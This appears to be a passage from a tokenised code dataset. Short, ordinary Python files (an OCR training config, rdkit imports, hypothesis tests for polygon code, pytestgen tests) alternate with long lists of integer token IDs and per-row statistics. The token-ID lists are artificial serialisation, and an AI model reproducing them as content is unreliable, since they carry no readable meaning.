3467,
11201,
7,
87,
62,
73,
38165,
3467,
3506,
8,
628,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
5391,
357,
600,
2599,
317,
15793,
1863,
543,
5972,
18380,
9806,
481,
307,
29231,
13,
628,
220,
220,
220,
25959,
25,
198,
220,
220,
220,
220,
220,
220,
220,
532,
23412,
25,
1058,
11018,
25,
63,
7,
45,
11,
31936,
63,
810,
4600,
9,
63,
1724,
11,
597,
1271,
286,
3224,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
15225,
198,
220,
220,
220,
220,
220,
220,
220,
532,
25235,
25,
1058,
11018,
25,
63,
7,
45,
11,
31936,
47671,
976,
5485,
355,
262,
5128,
628,
220,
220,
220,
1114,
1672,
25,
628,
220,
220,
220,
11485,
2438,
12,
9967,
3712,
21015,
628,
220,
220,
220,
220,
220,
220,
220,
1330,
530,
11125,
13,
23100,
9134,
355,
5202,
198,
220,
220,
220,
220,
220,
220,
220,
1330,
299,
32152,
355,
45941,
628,
220,
220,
220,
220,
220,
220,
220,
285,
796,
5202,
13,
20471,
13,
11187,
18380,
9806,
7,
27740,
28,
16,
8,
198,
220,
220,
220,
220,
220,
220,
220,
2124,
796,
5202,
13,
51,
22854,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
45941,
13,
18747,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
16410,
657,
13,
11785,
21,
11,
532,
16,
13,
1129,
3553,
11,
220,
362,
13,
20,
38380,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
685,
352,
13,
1495,
4309,
11,
532,
16,
13,
3553,
2857,
11,
220,
657,
13,
3388,
1954,
11907,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1267,
198,
220,
220,
220,
220,
220,
220,
220,
1267,
198,
220,
220,
220,
220,
220,
220,
220,
331,
796,
285,
7,
87,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
16410,
12,
17,
13,
1495,
1485,
2920,
220,
220,
532,
18,
13,
23,
4304,
2414,
6420,
220,
532,
15,
13,
19880,
34287,
4089,
60,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
25915,
15,
13,
35133,
2154,
29334,
532,
18,
13,
34125,
1899,
2231,
220,
532,
16,
13,
28669,
1899,
3510,
2361,
60,
198,
220,
220,
220,
37227,
628,
198,
31,
505,
11125,
62,
39344,
7203,
20471,
13,
11187,
50,
17225,
1868,
4943,
198,
31,
23100,
9134,
62,
15042,
198,
4871,
5972,
50,
17225,
1868,
7,
26796,
2599,
198,
220,
220,
220,
374,
37811,
4677,
13508,
262,
5002,
12,
3083,
2163,
25,
628,
220,
220,
220,
11485,
10688,
3712,
198,
220,
220,
220,
220,
220,
220,
220,
3467,
5239,
90,
11187,
50,
17225,
1868,
92,
7,
87,
8,
796,
3467,
6404,
59,
9464,
38016,
31944,
90,
352,
1782,
90,
352,
1343,
3467,
11201,
32590,
87,
8,
32239,
3506,
8,
628,
220,
220,
220,
25959,
25,
198,
220,
220,
220,
220,
220,
220,
220,
532,
23412,
25,
1058,
11018,
25,
63,
7,
45,
11,
31936,
63,
810,
4600,
9,
63,
1724,
11,
597,
1271,
286,
3224,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
15225,
198,
220,
220,
220,
220,
220,
220,
220,
532,
25235,
25,
1058,
11018,
25,
63,
7,
45,
11,
31936,
47671,
976,
5485,
355,
262,
5128,
628,
220,
220,
220,
1114,
1672,
25,
628,
220,
220,
220,
11485,
2438,
12,
9967,
3712,
21015,
628,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
1330,
299,
32152,
355,
45941,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
1330,
530,
11125,
13,
23100,
9134,
355,
5202,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
5202,
13,
21633,
62,
68,
3536,
62,
18558,
1009,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
2124,
796,
45941,
13,
18747,
26933,
12,
15,
13,
20,
11,
657,
11,
657,
13,
20,
35944,
459,
2981,
7,
37659,
13,
22468,
2624,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
5128,
796,
5202,
13,
51,
22854,
7,
87,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
17259,
17225,
1868,
796,
5202,
13,
20471,
13,
11187,
50,
17225,
1868,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
503,
796,
17259,
17225,
1868,
7,
15414,
737,
77,
32152,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
3601,
7,
448,
8,
198,
220,
220,
220,
220,
220,
220,
220,
25915,
15,
13,
5607,
1821,
3324,
220,
220,
532,
15,
13,
3388,
33638,
4761,
220,
532,
15,
13,
2857,
30120,
38205,
60,
628,
220,
220,
220,
37227,
628,
198,
31,
505,
11125,
62,
39344,
7203,
20471,
13,
18380,
9541,
4943,
198,
31,
23100,
9134,
62,
15042,
198,
4871,
8297,
9541,
7,
26796,
2599,
198,
220,
220,
220,
374,
37811,
4677,
13508,
262,
5002,
12,
3083,
2163,
25,
628,
220,
220,
220,
11485,
10688,
3712,
198,
220,
220,
220,
220,
220,
220,
220,
3467,
5239,
90,
18380,
9541,
92,
7,
87,
8,
796,
3467,
31944,
90,
16,
18477,
59,
31361,
92,
1635,
3467,
6404,
7,
16,
1343,
3467,
11201,
38016,
31361,
1635,
2124,
4008,
628,
220,
220,
220,
8297,
17860,
318,
257,
7209,
40874,
284,
262,
797,
41596,
2163,
290,
460,
307,
973,
198,
220,
220,
220,
284,
1500,
3201,
262,
5072,
286,
257,
4572,
284,
1464,
307,
3967,
13,
628,
220,
220,
220,
1114,
29052,
10159,
262,
7822,
302,
24040,
284,
262,
14174,
2163,
198,
220,
220,
220,
618,
1058,
11018,
25,
63,
15414,
3467,
22355,
3467,
31361,
1875,
11387,
44646,
628,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
12159,
25,
262,
1058,
11018,
25,
63,
59,
31361,
63,
1988,
329,
262,
8297,
9541,
31760,
13,
15161,
25,
352,
198,
220,
220,
220,
220,
220,
220,
220,
11387,
25,
3815,
2029,
428,
34052,
284,
257,
14174,
2163,
13,
15161,
25,
1160,
628,
220,
220,
220,
25959,
25,
198,
220,
220,
220,
220,
220,
220,
220,
532,
23412,
25,
1058,
11018,
25,
63,
7,
45,
11,
31936,
63,
810,
4600,
9,
63,
1724,
11,
597,
1271,
286,
3224,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
15225,
198,
220,
220,
220,
220,
220,
220,
220,
532,
25235,
25,
1058,
11018,
25,
63,
7,
45,
11,
31936,
47671,
976,
5485,
355,
262,
5128,
628,
220,
220,
220,
1114,
1672,
25,
628,
220,
220,
220,
11485,
2438,
12,
9967,
3712,
21015,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
1330,
299,
32152,
355,
45941,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
1330,
530,
11125,
13,
23100,
9134,
355,
5202,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
5202,
13,
21633,
62,
68,
3536,
62,
18558,
1009,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
2124,
796,
45941,
13,
18747,
26933,
12,
15,
13,
20,
11,
657,
11,
657,
13,
20,
35944,
459,
2981,
7,
37659,
13,
22468,
2624,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
5128,
796,
5202,
13,
51,
22854,
7,
87,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
2705,
9541,
796,
5202,
13,
20471,
13,
18380,
9541,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
503,
796,
2705,
9541,
7,
15414,
737,
77,
32152,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
3601,
7,
448,
8,
198,
220,
220,
220,
220,
220,
220,
220,
685,
15,
13,
2857,
1821,
3324,
220,
657,
13,
3388,
33638,
4761,
657,
13,
5607,
1821,
3324,
2361,
198,
220,
220,
220,
37227,
628,
198,
31,
505,
11125,
62,
39344,
7203,
20471,
13,
39,
1371,
86,
680,
4943,
198,
31,
23100,
9134,
62,
15042,
198,
4871,
367,
1371,
86,
680,
7,
26796,
2599,
198,
220,
220,
220,
374,
37811,
4677,
13508,
262,
1327,
2032,
680,
2163,
11,
5002,
12,
3083,
11,
355,
3417,
287,
262,
3348,
25,
198,
220,
220,
220,
4600,
18243,
278,
329,
12173,
7934,
53,
18,
63,
44807,
628,
220,
220,
220,
11485,
10688,
3712,
198,
220,
220,
220,
220,
220,
220,
220,
3467,
5239,
90,
39,
1371,
86,
680,
92,
7,
87,
8,
796,
3467,
27471,
90,
33964,
92,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
657,
1222,
3467,
5239,
90,
611,
1782,
2124,
3467,
293,
532,
18,
220,
26867,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2124,
1222,
3467,
5239,
90,
611,
1782,
2124,
3467,
469,
1343,
18,
26867,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2124,
9,
7,
87,
10,
18,
20679,
21,
1222,
3467,
5239,
90,
4306,
1782,
26867,
198,
220,
220,
220,
220,
220,
220,
220,
3467,
437,
90,
33964,
92,
628,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
287,
5372,
25,
460,
42976,
466,
262,
4905,
287,
12,
5372,
13,
15161,
25,
7559,
25101,
15506,
628,
220,
220,
220,
25959,
25,
198,
220,
220,
220,
220,
220,
220,
220,
532,
23412,
25,
1058,
11018,
25,
63,
7,
45,
11,
31936,
63,
810,
4600,
9,
63,
1724,
11,
597,
1271,
286,
3224,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
15225,
198,
220,
220,
220,
220,
220,
220,
220,
532,
25235,
25,
1058,
11018,
25,
63,
7,
45,
11,
31936,
47671,
976,
5485,
355,
262,
5128,
628,
220,
220,
220,
11485,
2438,
12,
9967,
3712,
21015,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
1330,
299,
32152,
355,
45941,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
1330,
530,
11125,
13,
23100,
9134,
355,
5202,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
5202,
13,
21633,
62,
68,
3536,
62,
18558,
1009,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
2124,
796,
45941,
13,
18747,
26933,
12,
15,
13,
20,
11,
657,
11,
657,
13,
20,
35944,
459,
2981,
7,
37659,
13,
22468,
2624,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
5128,
796,
5202,
13,
51,
22854,
7,
87,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
1327,
2032,
680,
796,
5202,
13,
20471,
13,
39,
1371,
86,
680,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
503,
796,
1327,
2032,
680,
7,
15414,
737,
77,
32152,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
3601,
7,
448,
8,
198,
220,
220,
220,
220,
220,
220,
220,
25915,
15,
13,
21315,
2091,
20370,
220,
657,
13,
220,
220,
220,
220,
220,
220,
220,
220,
220,
657,
13,
1959,
1433,
19060,
60,
198,
220,
220,
220,
220,
198,
220,
220,
220,
11485,
4808,
63,
18243,
278,
329,
12173,
7934,
53,
18,
63,
25,
198,
220,
220,
220,
220,
220,
220,
220,
3740,
1378,
283,
87,
452,
13,
2398,
14,
8937,
14,
1129,
2713,
13,
2999,
25707,
198,
220,
220,
220,
37227,
628,
198,
31,
505,
11125,
62,
39344,
7203,
20471,
13,
17309,
38006,
71,
4943,
198,
31,
23100,
9134,
62,
15042,
198,
4871,
6912,
38006,
71,
7,
26796,
2599,
198,
220,
220,
220,
374,
37811,
198,
220,
220,
220,
2034,
13508,
262,
6912,
45557,
71,
2163,
5002,
12,
3083,
628,
220,
220,
220,
6912,
45557,
71,
318,
5447,
355,
25,
628,
220,
220,
220,
11485,
10688,
3712,
198,
220,
220,
220,
220,
220,
220,
220,
3467,
5239,
90,
17309,
45557,
71,
92,
7,
87,
8,
796,
3467,
27471,
90,
33964,
92,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
352,
1222,
3467,
5239,
90,
611,
1782,
2124,
1875,
352,
26867,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
532,
16,
1222,
3467,
5239,
90,
611,
1782,
2124,
1279,
532,
16,
26867,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2124,
1222,
3467,
5239,
90,
4306,
1782,
26867,
198,
220,
220,
220,
220,
220,
220,
220,
3467,
437,
90,
33964,
92,
628,
220,
220,
220,
383,
2837,
286,
262,
14174,
3814,
1058,
11018,
25,
63,
58,
12,
16,
11,
352,
60,
63,
460,
307,
12328,
1262,
198,
220,
220,
220,
1058,
35226,
25,
63,
1084,
62,
2100,
63,
290,
1058,
35226,
25,
63,
9806,
62,
2100,
44646,
628,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
949,
62,
2100,
25,
5288,
1988,
286,
262,
14174,
3814,
2837,
13,
15161,
25,
532,
16,
198,
220,
220,
220,
220,
220,
220,
220,
3509,
62,
2100,
25,
5415,
1988,
286,
262,
14174,
3814,
2837,
13,
15161,
25,
352,
198,
220,
220,
220,
220,
220,
220,
220,
287,
5372,
25,
460,
42976,
466,
262,
4905,
287,
12,
5372,
13,
15161,
25,
7559,
25101,
15506,
628,
220,
220,
220,
7383,
4775,
7159,
1058,
35226,
25,
63,
1084,
62,
8367,
63,
290,
1058,
35226,
25,
63,
9806,
62,
8367,
63,
198,
220,
220,
220,
423,
587,
39224,
287,
2661,
286,
1058,
35226,
25,
63,
1084,
62,
2100,
63,
290,
1058,
35226,
25,
63,
9806,
62,
2100,
44646,
628,
220,
220,
220,
25959,
25,
198,
220,
220,
220,
220,
220,
220,
220,
532,
23412,
25,
1058,
11018,
25,
63,
7,
45,
11,
31936,
63,
810,
4600,
9,
63,
1724,
11,
597,
1271,
286,
3224,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
15225,
198,
220,
220,
220,
220,
220,
220,
220,
532,
25235,
25,
1058,
11018,
25,
63,
7,
45,
11,
31936,
47671,
976,
5485,
355,
262,
5128,
628,
220,
220,
220,
1114,
1672,
25,
628,
220,
220,
220,
11485,
2438,
12,
9967,
3712,
21015,
628,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
1330,
299,
32152,
355,
45941,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
1330,
530,
11125,
13,
23100,
9134,
355,
5202,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
5202,
13,
21633,
62,
68,
3536,
62,
18558,
1009,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
285,
796,
5202,
13,
20471,
13,
17309,
38006,
71,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
5240,
796,
45941,
13,
18747,
26933,
15,
13,
17,
11,
657,
13,
18,
11,
513,
13,
15,
11,
604,
13,
15,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
2124,
796,
5202,
13,
51,
22854,
7,
3258,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
503,
796,
285,
7,
87,
737,
77,
32152,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
3601,
7,
448,
8,
198,
220,
220,
220,
220,
220,
220,
220,
685,
15,
13,
17,
657,
13,
18,
352,
13,
220,
352,
13,
2361,
628,
220,
220,
220,
37227,
628,
198,
31,
505,
11125,
62,
39344,
7203,
20471,
13,
3123,
15492,
3041,
41596,
4943,
198,
31,
23100,
9134,
62,
15042,
198,
4871,
1004,
15492,
3041,
41596,
7,
26796,
2599,
198,
220,
220,
220,
374,
37811,
4677,
13508,
262,
5002,
12,
3083,
2163,
25,
628,
220,
220,
220,
11485,
10688,
3712,
198,
220,
220,
220,
220,
220,
220,
220,
3467,
5239,
90,
3123,
15492,
3041,
41596,
92,
7,
87,
8,
796,
3467,
9806,
7,
15,
11,
2124,
8,
1343,
3467,
5239,
90,
31591,
62,
6649,
3008,
92,
1635,
3467,
1084,
7,
15,
11,
2124,
8,
628,
220,
220,
220,
393,
628,
220,
220,
220,
11485,
10688,
3712,
198,
220,
220,
220,
220,
220,
220,
220,
3467,
5239,
90,
3123,
15492,
16448,
52,
92,
7,
87,
8,
796,
3467,
27471,
90,
33964,
92,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2124,
11,
1222,
3467,
5239,
90,
611,
1782,
2124,
3467,
469,
80,
657,
26867,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3467,
5239,
90,
31591,
62,
6649,
3008,
92,
3467,
22355,
2124,
11,
1222,
3467,
5239,
90,
4306,
1782,
198,
220,
220,
220,
220,
220,
220,
220,
3467,
437,
90,
33964,
92,
628,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
4633,
62,
6649,
3008,
25,
36357,
262,
9848,
286,
262,
4633,
22638,
13,
15161,
25,
352,
68,
12,
17,
198,
220,
220,
220,
220,
220,
220,
220,
287,
5372,
25,
460,
42976,
466,
262,
4905,
287,
12,
5372,
13,
15161,
25,
7559,
25101,
15506,
628,
220,
220,
220,
25959,
25,
198,
220,
220,
220,
220,
220,
220,
220,
532,
23412,
25,
1058,
11018,
25,
63,
7,
45,
11,
31936,
63,
810,
4600,
9,
63,
1724,
11,
597,
1271,
286,
3224,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
15225,
198,
220,
220,
220,
220,
220,
220,
220,
532,
25235,
25,
1058,
11018,
25,
63,
7,
45,
11,
31936,
47671,
976,
5485,
355,
262,
5128,
628,
220,
220,
220,
1114,
1672,
25,
628,
220,
220,
220,
11485,
2438,
12,
9967,
3712,
21015,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
1330,
299,
32152,
355,
45941,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
1330,
530,
11125,
13,
23100,
9134,
355,
5202,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
5202,
13,
21633,
62,
68,
3536,
62,
18558,
1009,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
285,
796,
5202,
13,
20471,
13,
3123,
15492,
3041,
41596,
7,
15,
13,
16,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
5240,
796,
45941,
13,
18747,
26933,
15,
13,
17,
11,
657,
13,
18,
11,
513,
13,
15,
11,
604,
13,
15,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
2124,
796,
5202,
13,
51,
22854,
7,
3258,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
503,
796,
285,
7,
87,
737,
77,
32152,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
3601,
7,
448,
8,
198,
220,
220,
220,
220,
220,
220,
220,
685,
15,
13,
17,
657,
13,
18,
513,
13,
220,
604,
13,
2361,
198,
220,
220,
220,
37227,
628,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
198,
220,
220,
220,
1330,
10412,
395,
628,
220,
220,
220,
10412,
395,
13,
9288,
4666,
3419,
198
] | 2.151306 | 8,268 |
"""
####################################################################################################
# Copyright Info : Copyright (c) Davar Lab @ Hikvision Research Institute. All rights reserved.
# Filename : mango_r50_ete_pretrain.py
# Abstract : Model settings for mask rcnn spotter end-to-end pretrain on synthdata.
# Current Version: 1.0.0
# Date : 2020-06-24
######################################################################################################
"""
_base_ = './__base__.py'
data = dict(
samples_per_gpu=4,
workers_per_gpu=4,
train=dict(
ann_file=[
'/path/to/datalist/synthtext_80w.json',
],
img_prefix=[
'/path/to/SynthText/',
]
),
val=dict(
ann_file='/path/to/datalist/icdar2013_test_datalist.json',
img_prefix='/path/to/ICDAR2013-Focused-Scene-Text/',
),
test=dict(
ann_file='/path/to/datalist/icdar2013_test_datalist.json',
img_prefix='/path/to/ICDAR2013-Focused-Scene-Text/',
)
)
optimizer=dict(lr=1e-3)
lr_config = dict(step=[2, 3])
runner = dict(max_epochs=4)
checkpoint_config = dict(interval=1, filename_tmpl='checkpoint/res50_ete_pretrain_epoch_{}.pth')
work_dir = '/path/to/workspace/log/'
load_from = '/path/to/Model_Zoo/mask_rcnn_r50_fpn_2x_20181010-41d35c05.pth'
| [
37811,
198,
29113,
29113,
29113,
4242,
198,
2,
15069,
14151,
1058,
220,
220,
220,
15069,
357,
66,
8,
2544,
283,
3498,
2488,
39790,
10178,
4992,
5136,
13,
1439,
2489,
10395,
13,
198,
2,
7066,
12453,
220,
220,
220,
220,
220,
220,
1058,
220,
220,
220,
49364,
62,
81,
1120,
62,
14471,
62,
5310,
3201,
13,
9078,
198,
2,
27741,
220,
220,
220,
220,
220,
220,
1058,
220,
220,
220,
9104,
6460,
329,
9335,
48321,
20471,
4136,
353,
886,
12,
1462,
12,
437,
2181,
3201,
319,
33549,
7890,
13,
198,
198,
2,
9236,
10628,
25,
220,
220,
220,
352,
13,
15,
13,
15,
198,
2,
7536,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1058,
220,
220,
220,
12131,
12,
3312,
12,
1731,
198,
29113,
29113,
29113,
4242,
2235,
198,
37811,
198,
62,
8692,
62,
796,
705,
19571,
834,
8692,
834,
13,
9078,
6,
198,
198,
7890,
796,
8633,
7,
198,
220,
220,
220,
8405,
62,
525,
62,
46999,
28,
19,
11,
198,
220,
220,
220,
3259,
62,
525,
62,
46999,
28,
19,
11,
198,
220,
220,
220,
4512,
28,
11600,
7,
198,
220,
220,
220,
220,
220,
220,
220,
1529,
62,
7753,
41888,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
31051,
6978,
14,
1462,
14,
67,
10254,
396,
14,
28869,
400,
5239,
62,
1795,
86,
13,
17752,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
16589,
198,
220,
220,
220,
220,
220,
220,
220,
33705,
62,
40290,
41888,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
31051,
6978,
14,
1462,
14,
29934,
400,
8206,
14,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
2361,
198,
220,
220,
220,
10612,
198,
220,
220,
220,
1188,
28,
11600,
7,
198,
220,
220,
220,
220,
220,
220,
220,
1529,
62,
7753,
11639,
14,
6978,
14,
1462,
14,
67,
10254,
396,
14,
291,
27455,
6390,
62,
9288,
62,
67,
10254,
396,
13,
17752,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
33705,
62,
40290,
11639,
14,
6978,
14,
1462,
14,
2149,
35,
1503,
6390,
12,
37,
13073,
12,
36542,
12,
8206,
14,
3256,
198,
220,
220,
220,
10612,
198,
220,
220,
220,
1332,
28,
11600,
7,
198,
220,
220,
220,
220,
220,
220,
220,
1529,
62,
7753,
11639,
14,
6978,
14,
1462,
14,
67,
10254,
396,
14,
291,
27455,
6390,
62,
9288,
62,
67,
10254,
396,
13,
17752,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
33705,
62,
40290,
11639,
14,
6978,
14,
1462,
14,
2149,
35,
1503,
6390,
12,
37,
13073,
12,
36542,
12,
8206,
14,
3256,
198,
220,
220,
220,
1267,
198,
8,
198,
40085,
7509,
28,
11600,
7,
14050,
28,
16,
68,
12,
18,
8,
198,
14050,
62,
11250,
796,
8633,
7,
9662,
41888,
17,
11,
513,
12962,
198,
16737,
796,
8633,
7,
9806,
62,
538,
5374,
82,
28,
19,
8,
198,
9122,
4122,
62,
11250,
796,
8633,
7,
3849,
2100,
28,
16,
11,
29472,
62,
17209,
489,
11639,
9122,
4122,
14,
411,
1120,
62,
14471,
62,
5310,
3201,
62,
538,
5374,
23330,
27422,
79,
400,
11537,
198,
1818,
62,
15908,
796,
31051,
6978,
14,
1462,
14,
5225,
10223,
14,
6404,
14,
6,
198,
2220,
62,
6738,
796,
31051,
6978,
14,
1462,
14,
17633,
62,
57,
2238,
14,
27932,
62,
6015,
20471,
62,
81,
1120,
62,
69,
21999,
62,
17,
87,
62,
1264,
6659,
20943,
12,
3901,
67,
2327,
66,
2713,
13,
79,
400,
6,
198
] | 2.389474 | 570 |
# -*- coding: utf-8 -*-
import os
import numpy as np
import pandas as pd
import rdkit
from rdkit import Chem, DataStructs
from rdkit.Chem import AllChem, Descriptors
DATA_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), "./train/data/pKaInWater.csv")
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
11748,
28686,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
19798,
292,
355,
279,
67,
198,
11748,
374,
67,
15813,
198,
6738,
374,
67,
15813,
1330,
12870,
11,
6060,
44909,
82,
198,
6738,
374,
67,
15813,
13,
41829,
1330,
1439,
41829,
11,
2935,
6519,
669,
198,
198,
26947,
62,
34219,
796,
28686,
13,
6978,
13,
22179,
7,
418,
13,
6978,
13,
15908,
3672,
7,
418,
13,
6978,
13,
397,
2777,
776,
7,
834,
7753,
834,
36911,
366,
19571,
27432,
14,
7890,
14,
79,
37281,
818,
19184,
13,
40664,
4943,
628,
198
] | 2.54717 | 106 |
from typing import Tuple
from hypothesis import given
from gon.base import (Multipolygon,
Point)
from tests.utils import equivalence
from . import strategies
@given(strategies.multipolygons)
@given(strategies.multipolygons_with_points)
| [
6738,
19720,
1330,
309,
29291,
198,
198,
6738,
14078,
1330,
1813,
198,
198,
6738,
35140,
13,
8692,
1330,
357,
15205,
541,
3366,
14520,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6252,
8,
198,
6738,
5254,
13,
26791,
1330,
6854,
594,
198,
6738,
764,
1330,
10064,
628,
198,
31,
35569,
7,
2536,
2397,
444,
13,
16680,
541,
3366,
70,
684,
8,
628,
198,
31,
35569,
7,
2536,
2397,
444,
13,
16680,
541,
3366,
70,
684,
62,
4480,
62,
13033,
8,
198
] | 2.75 | 96 |
from default_data import default_data
values={1:str(default_data.sample_id),2:default_data.sample_type,3:default_data.report_type,4:default_data.doc_type }
set_options = {1:"id", 2:"type", 3:"report", 4:"doc"}
get_options = {1: "name", 2: "intro", 3: "gene", 4: "stem-loop", 5: "peptide", 6: "cds", 7: "source", 8: "comment", 9: "all"}
cases = {0:"exit",1:"cls",2:"get",3:"help",4:"set",5:"visualize",6: "ftp",7: "options", 8: "fetch", 9: "searchd", 10: "searchl"}
error_key = {0: "Your browsing activity is empty.", 1: "Error404"} | [
6738,
4277,
62,
7890,
1330,
4277,
62,
7890,
198,
27160,
34758,
16,
25,
2536,
7,
12286,
62,
7890,
13,
39873,
62,
312,
828,
17,
25,
12286,
62,
7890,
13,
39873,
62,
4906,
11,
18,
25,
12286,
62,
7890,
13,
13116,
62,
4906,
11,
19,
25,
12286,
62,
7890,
13,
15390,
62,
4906,
1782,
198,
2617,
62,
25811,
796,
1391,
16,
11097,
312,
1600,
362,
11097,
4906,
1600,
513,
11097,
13116,
1600,
604,
11097,
15390,
20662,
198,
1136,
62,
25811,
796,
1391,
16,
25,
366,
3672,
1600,
362,
25,
366,
600,
305,
1600,
513,
25,
366,
70,
1734,
1600,
604,
25,
366,
927,
12,
26268,
1600,
642,
25,
366,
431,
457,
485,
1600,
718,
25,
366,
66,
9310,
1600,
767,
25,
366,
10459,
1600,
807,
25,
366,
23893,
1600,
860,
25,
366,
439,
20662,
198,
33964,
796,
1391,
15,
11097,
37023,
1600,
16,
11097,
565,
82,
1600,
17,
11097,
1136,
1600,
18,
11097,
16794,
1600,
19,
11097,
2617,
1600,
20,
11097,
41464,
1096,
1600,
21,
25,
366,
701,
79,
1600,
22,
25,
366,
25811,
1600,
807,
25,
366,
69,
7569,
1600,
860,
25,
366,
12947,
67,
1600,
838,
25,
366,
12947,
75,
20662,
198,
18224,
62,
2539,
796,
1391,
15,
25,
366,
7120,
23182,
3842,
318,
6565,
33283,
352,
25,
366,
12331,
26429,
20662
] | 2.492958 | 213 |
from ast import FunctionDef
from os import path
from munch import munchify
from pyfakefs.pytest_plugin import fs
import pytest
from pytestgen.load import PyTestGenInputFile
from pytestgen.parse import PyTestGenParsedSet, PyTestGenParsedFile, get_existing_test_functions
import pytestgen.output
from fixtures import mock_module_testable_func, mock_class_testable_func
@pytest.fixture
@pytest.fixture
| [
6738,
6468,
1330,
15553,
7469,
198,
6738,
28686,
1330,
3108,
198,
198,
6738,
285,
3316,
1330,
285,
3316,
1958,
198,
6738,
12972,
30706,
9501,
13,
9078,
9288,
62,
33803,
1330,
43458,
198,
11748,
12972,
9288,
198,
198,
6738,
12972,
9288,
5235,
13,
2220,
1330,
9485,
14402,
13746,
20560,
8979,
198,
6738,
12972,
9288,
5235,
13,
29572,
1330,
9485,
14402,
13746,
47,
945,
276,
7248,
11,
9485,
14402,
13746,
47,
945,
276,
8979,
11,
651,
62,
25687,
62,
9288,
62,
12543,
2733,
198,
11748,
12972,
9288,
5235,
13,
22915,
198,
198,
6738,
34609,
1330,
15290,
62,
21412,
62,
9288,
540,
62,
20786,
11,
15290,
62,
4871,
62,
9288,
540,
62,
20786,
628,
198,
31,
9078,
9288,
13,
69,
9602,
628,
198,
31,
9078,
9288,
13,
69,
9602,
628,
628,
628
] | 3.186047 | 129 |
# Copyright 2017. Allen Institute. All rights reserved
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
#
